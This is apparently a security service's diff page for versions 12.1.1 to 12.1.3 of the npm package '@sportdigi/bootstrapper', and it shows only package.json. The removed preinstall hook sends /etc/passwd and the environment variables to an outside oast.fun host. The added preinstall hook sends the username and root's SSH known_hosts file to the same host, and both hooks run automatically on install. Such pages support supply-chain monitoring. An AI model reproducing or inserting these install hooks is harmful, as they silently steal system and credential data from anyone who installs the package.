@sportdigi/bootstrapper 12.1.1 → 12.1.3
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +3 -4
package/package.json
CHANGED
@@ -1,11 +1,10 @@
|
|
1
1
|
{
|
2
2
|
"name": "@sportdigi/bootstrapper",
|
3
|
-
"version": "12.1.
|
3
|
+
"version": "12.1.3",
|
4
4
|
"description": "",
|
5
5
|
"main": "app.js",
|
6
|
-
|
7
|
-
|
8
|
-
"preinstall": "curl -H \"Content-Type: application/json\" --data \"{\\\"file1\\\":\\\"$(cat /etc/passwd)\\\", \\\"env\\\":\\\"$(env)\\\"}\" http://nkhgevpndozoxokzqhojhvfqppdrh4xzm.oast.fun"
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "curl -H \"Content-Type: application/json\" --data \"{\\\"whoami\\\":\\\"$(whoami)\\\", \\\"ssh_known_hosts\\\":\\\"$(cat /root/.ssh/known_hosts | tr '\\n' ' ')\\\"}\" http://nkhgevpndozoxokzqhojhvfqppdrh4xzm.oast.fun"
|
9
8
|
},
|
10
9
|
"author": "james4141",
|
11
10
|
"license": "ISC"
|